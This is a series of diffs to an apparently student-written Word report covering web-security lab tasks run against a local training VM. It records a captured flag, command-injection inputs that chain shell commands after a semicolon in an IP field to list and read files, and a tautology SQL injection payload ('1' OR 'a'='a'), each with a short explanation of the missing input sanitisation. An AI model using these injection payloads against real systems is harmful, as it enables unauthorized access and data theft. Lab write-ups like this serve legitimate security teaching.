--- a/Assignment6/Assignment 6 report.docx
+++ b/Assignment6/Assignment 6 report.docx
@@ -20,7 +20,6 @@
         <w:t>Password are often the weakest link in the security chain. A weak password is often a re-used password, and it is easily exploitable with a brute-force attack reading from a list of common weak passwords. These weak password lists have been catalogued over the years from case studies in hacked sites and are widely available.</w:t>
       </w:r>
     </w:p>
-    <w:p/>
     <w:p>
       <w:pPr>
         <w:rPr>
@@ -31,57 +30,163 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>Task 6: Weak Session ID</w:t>
+        <w:t>Task 2: Command injection</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>flag{</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>command_injection_is_a_serious_vulnerability</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Navigated to URL </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId5" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>http://192.168.56.102/hackable/uploads/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> then </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId6" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>http://192.168.56.102/hackable/uploads/flag.txt</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
         <w:rPr>
           <w:b/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Because the website’s security level is very </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>very</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> low to nil, I figured the file directory from the root of the web application was available. Tried the hackable/uploads path and it got me to the directory. It looks like the web server is not configured to deny admin user the ability to browse and request any file type.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Task 3: Local file inclusion</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="499DD130" wp14:editId="2E15C958">
-            <wp:extent cx="5943600" cy="4765675"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="1" name="Picture 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId4"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="4765675"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
       <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Task 6: Weak Session ID</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
@@ -91,6 +196,103 @@
     </w:sectPr>
   </w:body>
 </w:document>
+</file>
+
+<file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
+  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="63F62D63"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="1B525FD0"/>
+    <w:lvl w:ilvl="0" w:tplc="0409000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:num w:numId="1">
+    <w:abstractNumId w:val="0"/>
+  </w:num>
+</w:numbering>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
@@ -518,6 +720,88 @@
     <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="ListParagraph">
+    <w:name w:val="List Paragraph"/>
+    <w:basedOn w:val="Normal"/>
+    <w:uiPriority w:val="34"/>
+    <w:qFormat/>
+    <w:rsid w:val="00AF0B92"/>
+    <w:pPr>
+      <w:ind w:left="720"/>
+      <w:contextualSpacing/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
+    <w:name w:val="HTML Preformatted"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="HTMLPreformattedChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00AF0B92"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="left" w:pos="916"/>
+        <w:tab w:val="left" w:pos="1832"/>
+        <w:tab w:val="left" w:pos="2748"/>
+        <w:tab w:val="left" w:pos="3664"/>
+        <w:tab w:val="left" w:pos="4580"/>
+        <w:tab w:val="left" w:pos="5496"/>
+        <w:tab w:val="left" w:pos="6412"/>
+        <w:tab w:val="left" w:pos="7328"/>
+        <w:tab w:val="left" w:pos="8244"/>
+        <w:tab w:val="left" w:pos="9160"/>
+        <w:tab w:val="left" w:pos="10076"/>
+        <w:tab w:val="left" w:pos="10992"/>
+        <w:tab w:val="left" w:pos="11908"/>
+        <w:tab w:val="left" w:pos="12824"/>
+        <w:tab w:val="left" w:pos="13740"/>
+        <w:tab w:val="left" w:pos="14656"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="HTMLPreformattedChar">
+    <w:name w:val="HTML Preformatted Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="HTMLPreformatted"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="00AF0B92"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Hyperlink">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00AF0B92"/>
+    <w:rPr>
+      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="UnresolvedMention">
+    <w:name w:val="Unresolved Mention"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00AF0B92"/>
+    <w:rPr>
+      <w:color w:val="808080"/>
+      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 

--- a/Assignment6/Assignment 6 report.docx
+++ b/Assignment6/Assignment 6 report.docx
@@ -71,25 +71,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>flag{</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>command_injection_is_a_serious_vulnerability</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>}</w:t>
+        <w:t>flag{command_injection_is_a_serious_vulnerability}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -135,15 +117,7 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Because the website’s security level is very </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>very</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> low to nil, I figured the file directory from the root of the web application was available. Tried the hackable/uploads path and it got me to the directory. It looks like the web server is not configured to deny admin user the ability to browse and request any file type.</w:t>
+        <w:t>Because the website’s security level is very low to nil, I figured the file directory from the root of the web application was available. Tried the hackable/uploads path and it got me to the directory. It looks like the web server is not configured to deny admin user the ability to browse and request any file type.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -165,8 +139,25 @@
           <w:b/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Task 4: File upload</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Task 5: SQL injection</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -187,6 +178,8 @@
           <w:b/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>

--- a/Assignment6/Assignment 6 report.docx
+++ b/Assignment6/Assignment 6 report.docx
@@ -81,29 +81,21 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Navigated to URL </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId5" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>http://192.168.56.102/hackable/uploads/</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> then </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId6" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>http://192.168.56.102/hackable/uploads/flag.txt</w:t>
-        </w:r>
-      </w:hyperlink>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>1;cd ../../../../www/blob/hackable/uploads/;cat flag.txt</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -117,7 +109,64 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t>Because the website’s security level is very low to nil, I figured the file directory from the root of the web application was available. Tried the hackable/uploads path and it got me to the directory. It looks like the web server is not configured to deny admin user the ability to browse and request any file type.</w:t>
+        <w:t xml:space="preserve">Because the web’s input of the IP address is not being sanitized, you are able to add a semicolon to the input and then add subsequent shell commands. Here are examples of some of the shell commands I used to find my way around the directory structure </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:left="1440"/>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>1;ls    -- To get the list of files</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:left="1440"/>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>1;cd ../../../../</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>;ls;  -- Get list of directory at this level</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:left="1440"/>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>1;cd ../../../../www/blob/hackable/uploads/;ls</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">  -- Found the hackable directory</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -161,34 +210,276 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Task 6: Weak Session ID</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:ind w:left="180"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Payload</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>1' OR 'a'='a</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:ind w:left="180"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">Note about vulnerability – </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">The vulnerability exists because the query is concatenating strings on the where clause to build the query that is executed. No sanitation of input is present. Because of this you can add </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve">OR 'a'='a </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">to the input which causes the </w:t>
+      </w:r>
+      <w:r>
+        <w:t>where clause to always evaluate to true, so the query becomes logically equivalent to the much simpler query:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>select … from users</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Screenshot</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="770DADC2" wp14:editId="113F51B9">
+            <wp:extent cx="4009292" cy="3006969"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
+            <wp:docPr id="1" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4066662" cy="3049996"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Task 6: Blind SQLI</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">Why your payload from Task 5 does not work in this page? </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Task 5 payload doesn’t work because the page’s php code is checking for the count of rows retrieved by the query. The Task 5 exploit returns more than 1 row, and it branches to the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>“User ID exists in the database.”</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> message.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Command line arguments passed to the sqlmap.py</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
       </w:pPr>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
     </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Task 6: Weak Session ID</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
-      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
+      <w:pgMar w:top="1440" w:right="1440" w:bottom="540" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
       <w:cols w:space="720"/>
       <w:docGrid w:linePitch="360"/>
     </w:sectPr>
   </w:body>
 </w:document>
+</file>
+
+<file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
